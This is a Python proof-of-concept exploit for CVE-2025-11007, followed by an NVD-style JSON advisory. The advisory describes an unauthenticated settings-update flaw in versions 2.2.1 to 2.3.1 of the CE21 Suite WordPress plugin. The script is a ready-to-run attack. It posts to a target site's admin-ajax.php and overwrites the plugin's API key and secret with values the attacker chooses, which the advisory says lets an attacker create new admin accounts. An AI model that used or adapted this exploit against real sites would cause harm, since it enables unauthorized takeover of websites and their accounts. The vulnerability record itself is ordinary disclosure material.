CVE-2025-11007

import requests import sys # CVE-2025-11007 PoC # WordPress CE21 Suite Plugin Unauthorized API Settings Update # Target: WordPress site with CE21 Suite plugin (versions 2.2.1 to 2.3.1) def exploit(target_url, api_key='attacker-controlled-key'): """ Exploit the missing capability check in CE21 Suite plugin Allows unauthenticated attackers to update API settings """ # Target the AJAX endpoint ajax_url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' # Payload to update API settings # This allows attacker to set a malicious API key data = { 'action': 'ce21_single_sign_on_save_api_settings', 'ce21_api_key': api_key, 'ce21_api_secret': 'attacker-secret', 'ce21_enabled': '1' } try: print(f'[*] Target: {target_url}') print(f'[*] Exploiting CVE-2025-11007...') print(f'[*] Sending malicious request to {ajax_url}') response = requests.post(ajax_url, data=data, timeout=30) if response.status_code == 200: print('[+] Request sent successfully') print(f'[+] Response: {response.text}') print('[+] API settings may have been updated') print('[+] Attacker can now potentially create admin accounts') else: print(f'[-] Request failed with status: {response.status_code}') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url> [api_key]') print(f'Example: python {sys.argv[0]} http://target.com malicious-api-key') sys.exit(1) target = sys.argv[1] key = sys.argv[2] if len(sys.argv) > 2 else 'attacker-controlled-key' exploit(target, key)

{"cve": {"id": "CVE-2025-11007", "sourceIdentifier": "[email protected]", "published": "2025-11-04T04:15:36.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CE21 Suite plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the wp_ajax_nopriv_ce21_single_sign_on_save_api_settings AJAX action in versions 2.2.1 to 2.3.1. This makes it possible for unauthenticated attackers to update the plugin's API settings including a secret key used for authentication. This allows unauthenticated attackers to create new admin accounts on an affected site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://wordpress.org/plugins/ce21-suite/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5e24feac-1812-45d7-b3c3-27787eed1cf1?source=cve", "source": "[email protected]"}]}}